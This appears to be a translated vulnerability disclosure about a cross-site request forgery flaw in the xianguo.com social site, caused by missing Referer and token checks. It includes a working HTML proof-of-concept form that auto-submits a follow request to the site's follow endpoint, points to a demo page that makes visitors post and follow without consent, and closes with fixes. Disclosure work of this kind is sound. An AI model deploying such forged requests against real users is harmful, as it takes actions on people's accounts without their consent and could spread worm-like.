A csrf vulnerability in xiaguo network may cause worms to spread, publish text and add attention without the user's consent!
Detailed Description: When receiving POST and GET information, the Referer of POST is not verified, and the token is not added to the POST information to verify the correctness of the information, cause the vulnerability.
Demo address: http://in.imlonghao.com/WooYun-XXXXX/ (username/password: imlonghao)
When you log on to the system, a Weibo account named Hello World will be automatically sent and a user will be followed.
Vulnerability address: http://xianguo.com/beings/follow
<Html>
<Body>
<Form id = "imlonghao" name = "imlonghao" action = "http://xianguo.com/beings/follow" method = "post">
<Input type = "text" name = "beingsIds" value = "1378148"/>
<Input type = "text" name = "parentId" value = "0"/>
<Input type = "text" name = "ftype" value = "0"/>
</Form>
<Script>
Document. imlonghao. submit ();
</Script>
</Body>
</Html>
Interface return information
Effect
[Text]
Solution:
Check POST Referer
Add token in POST information